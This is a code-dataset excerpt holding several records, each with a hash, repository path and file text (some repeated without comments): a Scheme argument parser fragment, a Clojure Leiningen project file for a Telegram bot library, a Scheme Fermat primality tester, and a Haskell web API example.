((and (pair? ident) (symbol? (car ident)))
(cons ident '()))
((not (symbol? ident))
(error/source-location "parse-formal-ident"
"Illegal identifier type"
ident
loc))
(else
(parse-typed-ident ident))))
(define (args->list args)
(cond
((null? args)
'())
((symbol? args)
(list args))
((pair? args)
(cons (car args) (args->list (cdr args))))
(else
(error/source 'args->list "Illegal args list" args args))))
(define (bindings->list bindings)
(cond
((null? bindings)
'())
((not (pair? bindings))
(error/source 'bindings->list "Illegal bindings list" bindings bindings))
((symbol? (car bindings))
(cons bindings (bindings->list (cdr bindings))))
((not (pair? (car bindings)))
(error/source 'bindings->list "Illegal bindings list" bindings bindings))
(else
(cons (car bindings) (bindings->list (cdr bindings))))))
|
e606b6c20496b5bda45eeab8ebfd62fe55b7f68d58e3d5eaa47b1b78f86e1b41 | wdhowe/telegrambot-lib | project.clj | (defproject telegrambot-lib "2.5.0"
:description "A library for interacting with the Telegram Bot API."
:url "-lib"
:license {:name "EPL-2.0 OR GPL-2.0-or-later WITH Classpath-exception-2.0"
:url "-2.0/"}
:dependencies [[clj-http "3.12.3"]
[environ "1.2.0"]
[org.clojure/clojure "1.11.1"]
[org.clojure/core.async "1.6.673"]
[org.clojure/tools.logging "1.2.4"]
[potemkin "0.4.6"]]
:repl-options {:init-ns telegrambot-lib.core}
:profiles {:dev [:project/dev :profiles/dev]
:test [:project/test :profiles/test]
;; only edit :profiles/* in profiles.clj
:profiles/dev {}
:profiles/test {}
:project/dev {:dependencies [;; logback-classic must be 1.3.x due to jdk8 support.
;; See: -lib/pull/120/commits/015d31621a3fd5a7f69dcf7c230d76d55f7a47c1
[ch.qos.logback/logback-classic "1.3.5" :upgrade :logback]
[clj-http-fake "1.0.3"]]
:plugins [[lein-environ "1.2.0"]]
:source-paths ["env/dev/clj"]
:resource-paths ["env/dev/resources"]}
:project/test {:plugins [[lein-environ "1.2.0"]]
:resource-paths ["env/test/resources"]}
:cheshire [:test {:dependencies [[cheshire "5.11.0"]]}]
:jsonista [:test {:dependencies [[metosin/jsonista "0.3.7"]]}]
:data.json [:test {:dependencies [[org.clojure/data.json "2.4.0"]]}]}
:test-selectors {:default (complement :json)
:json :json})
| null | https://raw.githubusercontent.com/wdhowe/telegrambot-lib/1ec60bd8fa6d83a9057933a4d04254cbe0b6d4d6/project.clj | clojure | only edit :profiles/* in profiles.clj
logback-classic must be 1.3.x due to jdk8 support.
See: -lib/pull/120/commits/015d31621a3fd5a7f69dcf7c230d76d55f7a47c1 | (defproject telegrambot-lib "2.5.0"
:description "A library for interacting with the Telegram Bot API."
:url "-lib"
:license {:name "EPL-2.0 OR GPL-2.0-or-later WITH Classpath-exception-2.0"
:url "-2.0/"}
:dependencies [[clj-http "3.12.3"]
[environ "1.2.0"]
[org.clojure/clojure "1.11.1"]
[org.clojure/core.async "1.6.673"]
[org.clojure/tools.logging "1.2.4"]
[potemkin "0.4.6"]]
:repl-options {:init-ns telegrambot-lib.core}
:profiles {:dev [:project/dev :profiles/dev]
:test [:project/test :profiles/test]
:profiles/dev {}
:profiles/test {}
[ch.qos.logback/logback-classic "1.3.5" :upgrade :logback]
[clj-http-fake "1.0.3"]]
:plugins [[lein-environ "1.2.0"]]
:source-paths ["env/dev/clj"]
:resource-paths ["env/dev/resources"]}
:project/test {:plugins [[lein-environ "1.2.0"]]
:resource-paths ["env/test/resources"]}
:cheshire [:test {:dependencies [[cheshire "5.11.0"]]}]
:jsonista [:test {:dependencies [[metosin/jsonista "0.3.7"]]}]
:data.json [:test {:dependencies [[org.clojure/data.json "2.4.0"]]}]}
:test-selectors {:default (complement :json)
:json :json})
|
698ccc33a8deef6cde0d045eb0d5e8f6e2cc56704df0f8ec1cbf8594db83e983 | acieroid/scala-am | fermat.scm | Fermat and Solovay - Strassen primality testing in Scheme .
Author :
;; Site: /
Mathematical support .
square(x ) = x^2
(define (square x) (* x x))
; modulo-power: a fast modular exponentiation routine.
; modulo-power(base,exp,n) = base^exp [mod n]
(define (modulo-power base exp n)
(if (= exp 0)
1
(if (odd? exp)
(modulo (* base (modulo-power base (- exp 1) n)) n)
(modulo (square (modulo-power base (/ exp 2) n)) n))))
;; Random number utilities.
;(define (random-char)
; (call-with-input-file "/dev/random"
; (lambda (port)
; (read-char port))))
;(define (random-num)
; (let ((n (char->integer (random-char))))
( if (= n 65533 )
; (random-num)
; n)))
( define ( random - bit ) ( modulo ( random - num ) 2 ) )
( define ( random - byte ) ( + ( modulo ( random - num ) ; 128 ) ( * 128 ( random - bit ) ) ) )
;(define (random bytes)
( if ( < = bytes 0 )
; 0
( + ( * 256 ( random ( - bytes 1 ) ) ) ( random - byte ) ) ) )
Primality tests .
is - trivial - composite ? : divisibility tests with the first few primes .
(define (is-trivial-composite? n)
(or (= (modulo n 2) 0)
(= (modulo n 3) 0)
(= (modulo n 5) 0)
(= (modulo n 7) 0)
(= (modulo n 11) 0)
(= (modulo n 13) 0)
(= (modulo n 17) 0)
(= (modulo n 19) 0)
(= (modulo n 23) 0)))
; is-fermat-prime?:
; Check, for many values of a:
a^(n-1 ) = 1 [ mod n ] ?
; If yes, could be prime.
; If no, then composite.
Warning : Some numbers ( though rare ) defeat this test .
(define (is-fermat-prime? n iterations)
(or (<= iterations 0)
(let* ((byte-size (ceiling (/ (log n) (log 2))))
(a (random byte-size)))
(if (= (modulo-power a (- n 1) n) 1)
(is-fermat-prime? n (- iterations 1))
#f))))
;; Prime generation.
generate - fermat - prime(byte - size ) yields a prime satisfying the Fermat test .
(define (generate-fermat-prime byte-size iterations)
(let ((n (random byte-size)))
(if
(and (not (is-trivial-composite? n)) (is-fermat-prime? n iterations))
n
(generate-fermat-prime byte-size iterations))))
;; Example
(define iterations 10)
(define byte-size 15)
(display "Generating prime...")
(newline)
(display (generate-fermat-prime byte-size iterations))
(display " is prime with at least probability 1 - 1/2^")
(display iterations)
(newline)
(display " if it is not a Carmichael number.")
(newline)
| null | https://raw.githubusercontent.com/acieroid/scala-am/13ef3befbfc664b77f31f56847c30d60f4ee7dfe/test/R5RS/WeiChenRompf2019/fermat.scm | scheme | Site: /
modulo-power: a fast modular exponentiation routine.
modulo-power(base,exp,n) = base^exp [mod n]
Random number utilities.
(define (random-char)
(call-with-input-file "/dev/random"
(lambda (port)
(read-char port))))
(define (random-num)
(let ((n (char->integer (random-char))))
(random-num)
n)))
128 ) ( * 128 ( random - bit ) ) ) )
(define (random bytes)
0
is-fermat-prime?:
Check, for many values of a:
If yes, could be prime.
If no, then composite.
Prime generation.
Example | Fermat and Solovay - Strassen primality testing in Scheme .
Author :
Mathematical support .
square(x ) = x^2
(define (square x) (* x x))
(define (modulo-power base exp n)
(if (= exp 0)
1
(if (odd? exp)
(modulo (* base (modulo-power base (- exp 1) n)) n)
(modulo (square (modulo-power base (/ exp 2) n)) n))))
( if (= n 65533 )
( define ( random - bit ) ( modulo ( random - num ) 2 ) )
( if ( < = bytes 0 )
( + ( * 256 ( random ( - bytes 1 ) ) ) ( random - byte ) ) ) )
Primality tests .
is - trivial - composite ? : divisibility tests with the first few primes .
(define (is-trivial-composite? n)
(or (= (modulo n 2) 0)
(= (modulo n 3) 0)
(= (modulo n 5) 0)
(= (modulo n 7) 0)
(= (modulo n 11) 0)
(= (modulo n 13) 0)
(= (modulo n 17) 0)
(= (modulo n 19) 0)
(= (modulo n 23) 0)))
a^(n-1 ) = 1 [ mod n ] ?
Warning : Some numbers ( though rare ) defeat this test .
(define (is-fermat-prime? n iterations)
(or (<= iterations 0)
(let* ((byte-size (ceiling (/ (log n) (log 2))))
(a (random byte-size)))
(if (= (modulo-power a (- n 1) n) 1)
(is-fermat-prime? n (- iterations 1))
#f))))
generate - fermat - prime(byte - size ) yields a prime satisfying the Fermat test .
(define (generate-fermat-prime byte-size iterations)
(let ((n (random byte-size)))
(if
(and (not (is-trivial-composite? n)) (is-fermat-prime? n iterations))
n
(generate-fermat-prime byte-size iterations))))
(define iterations 10)
(define byte-size 15)
(display "Generating prime...")
(newline)
(display (generate-fermat-prime byte-size iterations))
(display " is prime with at least probability 1 - 1/2^")
(display iterations)
(newline)
(display " if it is not a Carmichael number.")
(newline)
|
141e6b8cf34d60bad65ae427b7babcbc36a76aae17a4d73e451460c55aba3f0b | tel/serv | Ex1.hs | # LANGUAGE DataKinds #
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE TypeOperators #-}
import Data.Aeson (Value (..))
import Data.Maybe (fromMaybe)
import Data.Text (Text)
import Network.Wai.Handler.Warp (run)
import Serv.Api.Prelude
import Serv.Wai.Prelude
type RawBody = HasBody '[TextPlain] Text
type JSONBody = HasBody '[JSON] Value
type TheApi
= Endpoint ()
'[ GET ::: Outputs
'[ Ok :::
Respond '[ CacheControl ::: Raw Text ] RawBody
]
, PUT ::: CaptureBody '[JSON] (Maybe Value) (Outputs
'[ Ok :::
Respond '[ CacheControl ::: Raw Text ] JSONBody
])
, DELETE ::: Outputs
'[ InternalServerError :::
Respond '[] RawBody
]
]
apiSing :: Sing TheApi
apiSing = sing
impl :: Impl IO TheApi
impl = get <+> put <+> delete where
get =
SGET =:
(return . respond
$ emptyResponse SOk
& withHeader SCacheControl "foo"
& withBody "Hello")
put =
SPUT =:
(\body -> return . respond
$ emptyResponse SOk
& withHeader SCacheControl "foo"
& withBody (fromMaybe (String "no body passed") body))
delete =
SDELETE =:
(return . respond
$ emptyResponse SInternalServerError
& withBody "Server error")
theServer :: Server IO
theServer = server apiSing impl
main :: IO ()
main = run 3000 (serverApplication theServer)
| null | https://raw.githubusercontent.com/tel/serv/7967761d6c47f13f0edd567f8af9b1c7dc8b9a23/serv-wai/exe/Ex1.hs | haskell | # LANGUAGE OverloadedStrings #
# LANGUAGE TypeOperators # | # LANGUAGE DataKinds #
import Data.Aeson (Value (..))
import Data.Maybe (fromMaybe)
import Data.Text (Text)
import Network.Wai.Handler.Warp (run)
import Serv.Api.Prelude
import Serv.Wai.Prelude
type RawBody = HasBody '[TextPlain] Text
type JSONBody = HasBody '[JSON] Value
type TheApi
= Endpoint ()
'[ GET ::: Outputs
'[ Ok :::
Respond '[ CacheControl ::: Raw Text ] RawBody
]
, PUT ::: CaptureBody '[JSON] (Maybe Value) (Outputs
'[ Ok :::
Respond '[ CacheControl ::: Raw Text ] JSONBody
])
, DELETE ::: Outputs
'[ InternalServerError :::
Respond '[] RawBody
]
]
apiSing :: Sing TheApi
apiSing = sing
impl :: Impl IO TheApi
impl = get <+> put <+> delete where
get =
SGET =:
(return . respond
$ emptyResponse SOk
& withHeader SCacheControl "foo"
& withBody "Hello")
put =
SPUT =:
(\body -> return . respond
$ emptyResponse SOk
& withHeader SCacheControl "foo"
& withBody (fromMaybe (String "no body passed") body))
delete =
SDELETE =:
(return . respond
$ emptyResponse SInternalServerError
& withBody "Server error")
theServer :: Server IO
theServer = server apiSing impl
main :: IO ()
main = run 3000 (serverApplication theServer)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.